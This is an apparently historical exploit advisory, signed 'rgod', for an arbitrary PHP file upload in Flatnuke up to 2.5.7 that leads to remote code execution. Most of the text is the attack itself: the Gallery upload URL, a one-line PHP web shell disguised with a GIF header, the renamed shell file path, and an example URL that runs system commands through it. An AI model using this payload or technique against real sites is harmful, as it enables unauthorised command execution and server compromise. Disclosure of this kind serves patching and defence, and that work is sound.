flatnuke <= 2.5.7 arbitrary php file upload

12/07/200619.11.54
----- Flatnuke 2.5.7 arbitrary file upload / remote code execution -------------
software:
site: http://www.flatnuke.org/

if user Gallery uploads are enabled (not the default) you can go to:

http://[target]/[path_to_flatnuke]/index.php?mod=Gallery

to upload a shell.php file, ex:

GIF86<?php system($GET[cmd]);?>

file is renamed like this:

shell_by_[username].php

now you can launch commands, ex:

http://[target]/[path]/sections/Gallery/shell_by_rgod.php?cmd=ls%20-la

rgod
site: http://rgod.altervista.org
mail: rgod @ autistici.org

original url: http://retrogod.altervista.org/flatnuke257_adv.html